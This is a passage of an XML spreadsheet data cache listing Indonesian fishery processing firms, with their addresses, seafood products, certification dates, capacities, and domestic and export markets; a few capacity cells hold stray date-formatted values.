    <n v="50000"/>
    <s v="Kota Surabaya"/>
    <s v="Namibia"/>
  </r>
  <r>
    <n v="22846"/>
    <x v="156"/>
    <s v="CV. ANUGRAH BINTANG CEMERLANG"/>
    <s v="Jl. Bambu Runcing No.99, Kel. Pettuadae, Kec. Turikale, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2020-11-11T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22847"/>
    <x v="129"/>
    <s v="CV. SUMBER HARTA LAUT MAS"/>
    <s v="Komp Industri Pergudangan Safe N Lock, Jl. Lingkar Timur O No.1770, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Barramundi, Lencam, Sebelah, Kerapu, Layur, Bawal, Kakap, Kurisi)"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="700000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Japan, Sri Lanka, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22848"/>
    <x v="754"/>
    <s v="PT. TRI MITRA MAKMUR"/>
    <s v="Jl. Palem No.52 RT 002 RW 003, Kel. Lingkas Ujung, Kec. Tarakan Timur, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-11-17T00:00:00"/>
    <n v="768"/>
    <s v="Kabupaten Situbondo"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22850"/>
    <x v="755"/>
    <s v="PT. SABINDO RAYA GEMILANG"/>
    <s v="Jl. Gajah Mada, Kel. Karang Rejo, Kec. Tarakan Barat, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Udang Beku"/>
    <d v="2020-11-18T00:00:00"/>
    <n v="480000"/>
    <s v="Kota Tarakan"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22852"/>
    <x v="617"/>
    <s v="PT. LOUISIANA FAR EAST"/>
    <s v="Jl. Rembang Industri II/36, 36A, 36B, Kawasan Berikat (EPZ) PIER, Kel. Pejangkungan, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Seafood Bernilai Tambah Beku dan Produk Vegetarian"/>
    <d v="2020-10-14T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Jakarta Pusat, Kota Denpasar"/>
    <s v="China, Singapore, United Kingdom, United States"/>
  </r>
  <r>
    <n v="22853"/>
    <x v="756"/>
    <s v="PT, SEAFERMART JAYA RAYA"/>
    <s v="Jl, Cumi Raya No,3 Muara Baru, Room 302 dan 602, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2020-11-18T00:00:00"/>
    <n v="50980.99"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22854"/>
    <x v="756"/>
    <s v="PT, SEAFERMART JAYA RAYA"/>
    <s v="Jl, Cumi Raya No,3 Muara Baru, Room 302 dan 602, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-11-18T00:00:00"/>
    <n v="19711.8"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22855"/>
    <x v="756"/>
    <s v="PT, SEAFERMART JAYA RAYA"/>
    <s v="Jl, Cumi Raya No,3 Muara Baru, Room 302 dan 602, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Amberjack, Sebelah, Kuwe, Halibut, Bawal, Seabream, Kakap, Striped Jack, Ekor Kuning, Seabass)"/>
    <d v="2020-11-18T00:00:00"/>
    <s v="03/01/1900  10,45,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22857"/>
    <x v="756"/>
    <s v="PT, SEAFERMART JAYA RAYA"/>
    <s v="Jl, Cumi Raya No,3 Muara Baru, Room 302 dan 602, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2020-11-18T00:00:00"/>
    <s v="14/03/1900  16,39,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22858"/>
    <x v="756"/>
    <s v="PT, SEAFERMART JAYA RAYA"/>
    <s v="Jl, Cumi Raya No,3 Muara Baru, Room 302 dan 602, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Amberjack, Sebelah, Kuwe, Kerapu, Halibut, Bawal, Seabream, Kakap, Striped Jack, Ekor Kuning, Seabass)"/>
    <d v="2020-11-18T00:00:00"/>
    <s v="02/01/1900  19,09,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="22862"/>
    <x v="535"/>
    <s v="PT. LAUTAN DELI JAYA"/>
    <s v="Jl. Raya Perancis Gudang 9 Blok BG-BH, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Daging Tuna Beku"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22863"/>
    <x v="201"/>
    <s v="PT. LUCKY SAMUDRA PRATAMA"/>
    <s v="Jl. Muara Baru Ujung Blok F No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2020-11-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="22864"/>
    <x v="757"/>
    <s v="PT. REMBANG SPORTINDO MANDIRI"/>
    <s v="Kawasan Industri Pergudangan &amp; Industri Tunas Bitung Blok B2 No.5 Jl. Raya Serang KM 13,8, Kel. Pasirjaya, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-13T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Viet Nam"/>
  </r>
  <r>
    <n v="22865"/>
    <x v="757"/>
    <s v="PT. REMBANG SPORTINDO MANDIRI"/>
    <s v="Kawasan Industri Pergudangan &amp; Industri Tunas Bitung Blok B2 No.5 Jl. Raya Serang KM 13,8, Kel. Pasirjaya, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Segar (Lousan, Jahan, Kerapu, Layur, Bawal, Kakap, Kurisi, Ekor Kuning)"/>
    <d v="2020-11-13T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22866"/>
    <x v="757"/>
    <s v="PT. REMBANG SPORTINDO MANDIRI"/>
    <s v="Kawasan Industri Pergudangan &amp; Industri Tunas Bitung Blok B2 No.5 Jl. Raya Serang KM 13,8, Kel. Pasirjaya, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Segar (Makerel, Baby Tuna, Lemuru, Tongkol, Tembang, Japuh, Cakalang)"/>
    <d v="2020-11-13T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Philippines, Viet Nam"/>
  </r>
  <r>
    <n v="22867"/>
    <x v="757"/>
    <s v="PT. REMBANG SPORTINDO MANDIRI"/>
    <s v="Kawasan Industri Pergudangan &amp; Industri Tunas Bitung Blok B2 No.5 Jl. Raya Serang KM 13,8, Kel. Pasirjaya, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Hiu Beku"/>
    <d v="2020-11-13T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Philippines, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="22868"/>
    <x v="757"/>
    <s v="PT. REMBANG SPORTINDO MANDIRI"/>
    <s v="Kawasan Industri Pergudangan &amp; Industri Tunas Bitung Blok B2 No.5 Jl. Raya Serang KM 13,8, Kel. Pasirjaya, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-13T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Viet Nam"/>
  </r>
  <r>
    <n v="22869"/>
    <x v="757"/>
    <s v="PT. REMBANG SPORTINDO MANDIRI"/>
    <s v="Kawasan Industri Pergudangan &amp; Industri Tunas Bitung Blok B2 No.5 Jl. Raya Serang KM 13,8, Kel. Pasirjaya, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-13T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Philippines, Viet Nam"/>
  </r>
  <r>
    <n v="22870"/>
    <x v="757"/>
    <s v="PT. REMBANG SPORTINDO MANDIRI"/>
    <s v="Kawasan Industri Pergudangan &amp; Industri Tunas Bitung Blok B2 No.5 Jl. Raya Serang KM 13,8, Kel. Pasirjaya, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Lousan, Kerapu, Halibut, Bawal, Kurisi, Layur, Kakap)"/>
    <d v="2020-11-13T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="22871"/>
    <x v="757"/>
    <s v="PT. REMBANG SPORTINDO MANDIRI"/>
    <s v="Kawasan Industri Pergudangan &amp; Industri Tunas Bitung Blok B2 No.5 Jl. Raya Serang KM 13,8, Kel. Pasirjaya, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Salem, Tongkol, Kembung, Cakalang, Tenggiri)"/>
    <d v="2020-11-13T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Viet Nam"/>
  </r>
  <r>
    <n v="22872"/>
    <x v="758"/>
    <s v="PT. DAN LAUT INDONESIA"/>
    <s v="Jl. Kayu Besar Blok K No.4 RT 004 RW 002, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Asin Kering"/>
    <d v="2021-01-18T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Sri Lanka, Viet Nam"/>
  </r>
  <r>
    <n v="22873"/>
    <x v="758"/>
    <s v="PT. DAN LAUT INDONESIA"/>
    <s v="Jl. Kayu Besar Blok K No.4 RT 004 RW 002, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Teripang Beku"/>
    <d v="2021-01-18T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22874"/>
    <x v="758"/>
    <s v="PT. DAN LAUT INDONESIA"/>
    <s v="Jl. Kayu Besar Blok K No.4 RT 004 RW 002, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Teripang Kering"/>
    <d v="2021-01-18T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22875"/>
    <x v="757"/>
    <s v="PT. REMBANG SPORTINDO MANDIRI"/>
    <s v="Kawasan Industri Pergudangan &amp; Industri Tunas Bitung Blok B2 No.5 Jl. Raya Serang KM 13,8, Kel. Pasirjaya, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Daging Tuna Beku"/>
    <d v="2020-11-13T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Viet Nam"/>
  </r>
  <r>
    <n v="22876"/>
    <x v="753"/>
    <s v="PERUM PERIKANAN INDONESIA CABANG MERAUKE"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Merauke, Kel. Karang Indah, Kec. Merauke, Kabupaten Merauke&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Ikan Air Tawar Beku (Mujair, Gabus, Nila)"/>
    <d v="2020-12-07T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, Bangladesh, Cambodia, China, Japan, Korea, Democratic People's Republic of, Myanmar, Taiwan, Province of China, United Kingdom, United States"/>
  </r>
  <r>
    <n v="22877"/>
    <x v="682"/>
    <s v="CV. BERKAT MARINA JAYA"/>
    <s v="Kawasan Industri Candi-UKM Blok 20A No.08, Jl. Gatot Subroto, Kel. Ngaliyan, Kec. Ngaliyan, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Kipas Segar"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="48000"/>
    <m/>
    <s v="China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22878"/>
    <x v="759"/>
    <s v="PT. EMERALD SEAWEED INDONESIA"/>
    <s v="Jl. Raya Nongkojajar Km 1,4, Kel. Cowek, Kec. Purwodadi, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tepung Agar-agar"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="48000"/>
    <s v="Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22880"/>
    <x v="760"/>
    <s v="PT. KASIH PRIMA"/>
    <s v="Jl. Raya Wonoayu No.26, Kel. Gempol, Kec. Gempol, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Chitin, Chitosan"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22885"/>
    <x v="761"/>
    <s v="PT, INDOBOGA JAYA MAKMUR"/>
    <s v="Jl, Cumi Raya No,3 Muara Baru, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar"/>
    <d v="2020-11-26T00:00:00"/>
    <s v="18/07/1900  08,45,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22886"/>
    <x v="761"/>
    <s v="PT. INDOBOGA JAYA MAKMUR"/>
    <s v="Jl. Cumi Raya No.3 Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-11-26T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22887"/>
    <x v="761"/>
    <s v="PT. INDOBOGA JAYA MAKMUR"/>
    <s v="Jl. Cumi Raya No.3 Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-Cumi)"/>
    <d v="2020-11-26T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22888"/>
    <x v="761"/>
    <s v="PT. INDOBOGA JAYA MAKMUR"/>
    <s v="Jl. Cumi Raya No.3 Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2020-11-26T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22889"/>
    <x v="761"/>
    <s v="PT. INDOBOGA JAYA MAKMUR"/>
    <s v="Jl. Cumi Raya No.3 Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-26T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22890"/>
    <x v="761"/>
    <s v="PT. INDOBOGA JAYA MAKMUR"/>
    <s v="Jl. Cumi Raya No.3 Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2020-11-26T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22891"/>
    <x v="762"/>
    <s v="PT. BAHARI MAKMUR SEJATI"/>
    <s v="Kawasan Industri Modern Cikande, Jl. Utama Modern Industri AA No.1, Kel. Barengkok, Kec. Kibin, Kabupaten Serang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Beku"/>
    <d v="2020-12-21T00:00:00"/>
    <n v="10000000"/>
    <m/>
    <s v="Canada, France, United States"/>
  </r>
  <r>
    <n v="22892"/>
    <x v="763"/>
    <s v="PT. SINAR PURE FOODS INTERNATIONAL"/>
    <s v="Jl. Raya Madidir, Kel. Paceda, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Kaleng"/>
    <d v="2021-01-19T00:00:00"/>
    <n v="4000"/>
    <s v="Kota Surabaya, Kota Manado"/>
    <s v="Australia, Egypt, Switzerland, United Kingdom, United States"/>
  </r>
  <r>
    <n v="22893"/>
    <x v="764"/>
    <s v="CV, CAMAR LAUT"/>
    <s v="Jl, Raja Wadi Polapa, Kel, Dulomo, Kec, Tilango, Kabupaten Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Ikan Pelagis Segar (Baby Tuna, Tongkol, Deho, Kembung, Lemadang, Gindara, Merah, Layaran, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-01-25T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22894"/>
    <x v="764"/>
    <s v="CV. CAMAR LAUT"/>
    <s v="Jl. Raja Wadi Polapa, Kel. Dulomo, Kec. Tilango, Kabupaten Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Ikan Demersal Segar (Kerapu, Nike, Selayar, Kakap)"/>
    <d v="2021-01-25T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22895"/>
    <x v="147"/>
    <s v="PT. JAVA SEAFOOD"/>
    <s v="Desa Eretan Kulon, Kec. Kandang Haur, Kabupaten Indramayu&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Surimi Beku"/>
    <d v="2020-11-27T00:00:00"/>
    <n v="6600000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kabupaten Cirebon, Kabupaten Majalengka, Kota Pontianak"/>
    <s v="Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="22896"/>
    <x v="147"/>
    <s v="PT. JAVA SEAFOOD"/>
    <s v="Desa Eretan Kulon, Kec. Kandang Haur, Kabupaten Indramayu&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Kering"/>
    <d v="2020-11-27T00:00:00"/>
    <n v="10"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="22898"/>
    <x v="765"/>
    <s v="PT. SINAR BAHARI AGUNG"/>
    <s v="Jl. Raya Kendal - Batang Km 12, Kel. Truko, Kec. Kangkung, Kabupaten Kendal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan)"/>
    <d v="2020-11-23T00:00:00"/>
    <n v="12000"/>
    <s v="Kabupaten Kendal, Kabupaten Batang, Kabupaten Pemalang, Kabupaten Tegal, Kota Semarang"/>
    <m/>
  </r>
  <r>
    <n v="22900"/>
    <x v="147"/>
    <s v="PT. JAVA SEAFOOD"/>
    <s v="Desa Eretan Kulon, Kec. Kandang Haur, Kabupaten Indramayu&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Semi Kering"/>
    <d v="2020-11-27T00:00:00"/>
    <n v="50"/>
    <m/>
    <s v="Japan, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="22901"/>
    <x v="766"/>
    <s v="AHAR SENTOSA"/>
    <s v="BTN Bukit Karema Indah Blok G No.03, Kel. Karema, Kec. Mamuju, Kabupaten Mamuju&lt;br&gt;Sulawesi Barat"/>
    <n v="30"/>
    <s v="Amplang Bandeng"/>
    <d v="2021-05-24T00:00:00"/>
    <n v="1775"/>
    <s v="Kabupaten Mamuju"/>
    <m/>
  </r>
  <r>
    <n v="22902"/>
    <x v="766"/>
    <s v="AHAR SENTOSA"/>
    <s v="BTN Bukit Karema Indah Blok G No.03, Kel. Karema, Kec. Mamuju, Kabupaten Mamuju&lt;br&gt;Sulawesi Barat"/>
    <n v="30"/>
    <s v="Abon Marlin"/>
    <d v="2021-05-24T00:00:00"/>
    <n v="1620"/>
    <s v="Kabupaten Mamuju"/>
    <m/>
  </r>
  <r>
    <n v="22903"/>
    <x v="767"/>
    <s v="UD. CAHAYA KENCANA"/>
    <s v="Jl. Majapahit No.28, Kel. Gedangrowo, Kec. Prambon, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerupuk Ikan"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22904"/>
    <x v="767"/>
    <s v="UD. CAHAYA KENCANA"/>
    <s v="Jl. Majapahit No.28, Kel. Gedangrowo, Kec. Prambon, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerupuk Udang"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22905"/>
    <x v="768"/>
    <s v="CV. MUSTIKA"/>
    <s v="Pergudangan Sentra Kosambi Blok E/16, Kel. Kosambi Timur, Kec. Kosambi, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerupuk Kulit Ikan"/>
    <d v="2021-01-14T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bandung, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="China, Malaysia, Philippines, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="22906"/>
    <x v="769"/>
    <s v="POKLAHSAR TORANI SUMBER MAKMUR"/>
    <s v="Jl. Kalijaga No.173, Kel. Pegambiran, Kec. Lemahwungkuk, Kota Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Sosis Ikan, Otak-otak Ikan, Kaki Naga, Tahu Ikan, Siomay Ikan, Sick Ikan, Lumpia Ikan, Kekian, Scallop Ikan) "/>
    <d v="2020-11-10T00:00:00"/>
    <n v="42000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Cianjur, Kabupaten Ciamis, Kabupaten Kuningan, Kabupaten Cirebon, Kabupaten Majalengka, Kabupaten Subang, Kabupaten Karawang, Kabupaten Bekasi, Kota Sukabumi, Kota Cirebon, Kota Depok, Kota Tasikmalaya, Kabupaten Cilacap, Kabupaten Pemalang, Kota Magelang, Kota Semarang, Kota Yogyakarta, Kota Malang, Kabupaten Serang"/>
    <m/>
  </r>
  <r>
    <n v="22907"/>
    <x v="770"/>
    <s v="PT. MAKMUR BERJAYA INDO CHINA"/>
    <s v="Jl. Raya Perancis Komp. Pergudangan 75 Blok K No.4, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-12-03T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="22908"/>
    <x v="770"/>
    <s v="PT. MAKMUR BERJAYA INDO CHINA"/>
    <s v="Jl. Raya Perancis Komp. Pergudangan 75 Blok K No.4, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerapu Hidup"/>
    <d v="2020-12-03T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22909"/>
    <x v="770"/>
    <s v="PT. MAKMUR BERJAYA INDO CHINA"/>
    <s v="Jl. Raya Perancis Komp. Pergudangan 75 Blok K No.4, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Hidup"/>
    <d v="2020-12-03T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22910"/>
    <x v="770"/>
    <s v="PT. MAKMUR BERJAYA INDO CHINA"/>
    <s v="Jl. Raya Perancis Komp. Pergudangan 75 Blok K No.4, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Keong Hidup"/>
    <d v="2020-12-03T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22911"/>
    <x v="770"/>
    <s v="PT. MAKMUR BERJAYA INDO CHINA"/>
    <s v="Jl. Raya Perancis Komp. Pergudangan 75 Blok K No.4, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Ronggeng Hidup"/>
    <d v="2020-12-03T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22912"/>
    <x v="771"/>
    <s v="CV. KYRIA REZEKI"/>
    <s v="Jl. Merpati Kampung Sidojadi, Kel. Batu IX, Kec. Tanjungpinang Timur, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
